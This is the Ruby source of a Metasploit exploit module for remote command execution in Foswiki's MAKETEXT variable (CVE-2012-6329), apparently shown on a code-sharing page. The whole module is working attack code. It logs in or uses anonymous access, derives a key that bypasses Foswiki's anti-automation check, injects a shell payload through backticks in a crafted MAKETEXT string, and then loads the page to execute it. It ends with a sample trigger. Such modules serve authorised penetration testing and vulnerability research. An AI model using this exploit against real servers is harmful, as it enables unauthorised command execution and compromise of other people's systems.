Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Foswiki MAKETEXT Remote Command Execution',
14
      'Description'    => %q{
15
          This module exploits a vulnerability in the MAKETEXT Foswiki variable. By using
16
        a specially crafted MAKETEXT, a malicious user can execute shell commands since the
17
        input is passed to the Perl "eval" command without first being sanitized. The
18
        problem is caused by an underlying security issue in the CPAN:Locale::Maketext
19
        module.  Only Foswiki sites that have user interface localization enabled
20
        (UserInterfaceInternationalisation variable set) are vulnerable.
21

22
          If USERNAME and PASSWORD aren't provided, anonymous access will be tried.
23
        Also, if the FoswikiPage option isn't provided, the module will try to create a
24
        random page on the SandBox space. The modules has been tested successfully on
25
        Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware image.
26
      },
27
      'Author'         =>
28
        [
29
          'Brian Carlson', # original discovery in Perl Locale::Maketext
30
          'juan vazquez' # Metasploit module
31
        ],
32
      'License'        => MSF_LICENSE,
33
      'References'     =>
34
        [
35
          [ 'CVE', '2012-6329' ],
36
          [ 'OSVDB', '88410' ],
37
          [ 'URL', 'http://foswiki.org/Support/SecurityAlert-CVE-2012-6330' ]
38
        ],
39
      'Privileged'     => false, # web server context
40
      'Payload'        =>
41
        {
42
          'DisableNops' => true,
43
          'Space'       => 1024,
44
          'Compat'      =>
45
            {
46
              'PayloadType' => 'cmd',
47
              'RequiredCmd' => 'generic ruby python telnet'
48
            }
49
        },
50
      'Platform'       => [ 'unix' ],
51
      'Arch'           => ARCH_CMD,
52
      'Targets'        => [[ 'Foswiki 1.1.5', { }]],
53
      'DisclosureDate' => '2012-12-03',
54
      'DefaultTarget'  => 0))
55

56
    register_options(
57
      [
58
        OptString.new('TARGETURI', [ true, "Foswiki base path", "/" ]),
59
        OptString.new('FoswikiPage', [ false, "Foswiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)" ]),
60
        OptString.new('USERNAME', [ false,  "The user to authenticate as (anonymous if username not provided)"]),
61
        OptString.new('PASSWORD', [ false,  "The password to authenticate with (anonymous if password not provided)" ])
62
      ])
63
  end
64

65
  def post_auth?
66
    true
67
  end
68

69
  def do_login(username, password)
70
    res = send_request_cgi({
71
      'method'   => 'POST',
72
      'uri'      => "#{@base}bin/login",
73
      'vars_post' =>
74
        {
75
          'username' => username,
76
          'password' => password
77
        }
78
      })
79

80
    if not res or res.code != 302 or res.get_cookies !~ /FOSWIKISID=([0-9a-f]*)/
81
      vprint_status "#{res.code}\n#{res.body}"
82
      return nil
83
    end
84

85
    session = $1
86
    return session
87
  end
88

89
  def inject_code(session, code)
90

91
    vprint_status("Retrieving the validation_key...")
92

93
    res = send_request_cgi({
94
      'uri'      => "#{@base}bin/edit#{@page}",
95
      'cookie'   => "FOSWIKISID=#{session}"
96
    })
97

98
    if not res or res.code != 200 or res.body !~ /name='validation_key' value='\?([0-9a-f]*)'/
99
      vprint_error("Error retrieving the validation_key")
100
      return nil
101
    end
102

103
    validation_key = $1
104
    vprint_good("validation_key found: #{validation_key}")
105

106
    if session.empty?
107
      if res.get_cookies =~ /FOSWIKISID=([0-9a-f]*)/
108
        session = $1
109
      else
110
        vprint_error("Error using anonymous access")
111
        return nil
112
      end
113
    end
114

115
    if res.get_cookies =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/
116
      strike_one = $1
117
    else
118
      vprint_error("Error getting the FOSWIKISTRIKEONE value")
119
      return nil
120
    end
121

122
    # Transforming validation_key in order to bypass foswiki antiautomation
123
    validation_key = Rex::Text.md5(validation_key + strike_one)
124
    vprint_status("Transformed validation key: #{validation_key}")
125
    vprint_status("Injecting the payload...")
126

127
    res = send_request_cgi({
128
      'method'   => 'POST',
129
      'uri'      => "#{@base}bin/save#{@page}",
130
      'cookie'   => "FOSWIKISID=#{session}",
131
      'vars_post' =>
132
      {
133
        'validation_key' => validation_key,
134
        'text' => "#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\'}; `#{code}`; { #\" args=\"#{rand_text_alpha(3 + rand(3))}\"}%"
135
      }
136

137
    })
138

139
    if not res or res.code != 302 or res.headers['Location'] !~ /bin\/view#{@page}/
140
      print_warning("Error injecting the payload")
141
      print_status "#{res.code}\n#{res.body}\n#{res.headers['Location']}"
142
      return nil
143
    end
144

145
    location = URI(res.headers['Location']).path
146
    print_good("Payload injected on #{location}")
147

148
    return location
149
  end
150

151
  def check
152
    @base = target_uri.path
153
    @base << '/' if @base[-1, 1] != '/'
154

155
    res = send_request_cgi({
156
      'uri'      => "#{@base}System/WebHome"
157
    })
158

159
    if not res or res.code != 200
160
      return Exploit::CheckCode::Unknown
161
    end
162

163
    if res.body =~ /This site is running Foswiki version.*Foswiki-(\d\.\d\.\d)/
164
      version = $1
165
      print_status("Version found: #{version}")
166
      if version <= "1.1.6"
167
        return Exploit::CheckCode::Appears
168
      else
169
        return Exploit::CheckCode::Detected
170
      end
171
    end
172

173
    return Exploit::CheckCode::Safe
174
  end
175

176

177
  def exploit
178

179
    # Init variables
180
    @page = ''
181

182
    if datastore['FoswikiPage'] and not datastore['FoswikiPage'].empty?
183
      @page << '/' if datastore['FoswikiPage'][0] != '/'
184
      @page << datastore['FoswikiPage']
185
    else
186
      @page << "/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}"
187
    end
188

189
    @base = target_uri.path
190
    @base << '/' if @base[-1, 1] != '/'
191

192
    # Login if needed
193
    if (datastore['USERNAME'] and
194
      not datastore['USERNAME'].empty? and
195
      datastore['PASSWORD'] and
196
      not datastore['PASSWORD'].empty?)
197
      print_status("Trying login to get session ID...")
198
      session = do_login(datastore['USERNAME'], datastore['PASSWORD'])
199
    else
200
      print_status("Using anonymous access...")
201
      session = ""
202
    end
203

204
    if not session
205
      fail_with(Failure::Unknown, "Error getting a session ID")
206
    end
207

208
    # Inject payload
209
    print_status("Trying to inject the payload on #{@page}...")
210
    res = inject_code(session, payload.encoded)
211
    if not res or res !~ /#{@page}/
212
      fail_with(Failure::Unknown, "Error injecting the payload")
213
    end
214

215
    # Execute payload
216
    print_status("Executing the payload through #{@page}...")
217
    res = send_request_cgi({
218
      'uri'      => "#{@base}#{@page}",
219
      'cookie'   => "FOSWIKISID=#{session}"
220
    })
221
    if not res or res.code != 200 or res.body !~ /HASH/
222
      print_status("#{res.code}\n#{res.body}")
223
      fail_with(Failure::Unknown, "Error executing the payload")
224
    end
225

226
    print_good("Exploitation was successful")
227

228
  end
229
end
230

231
=begin
232

233
* Trigger:
234

235
%MAKETEXT{"test [_1] secondtest\\'}; `touch /tmp/msf.txt`; { #" args="msf"}%
236

237
=end
238

239

240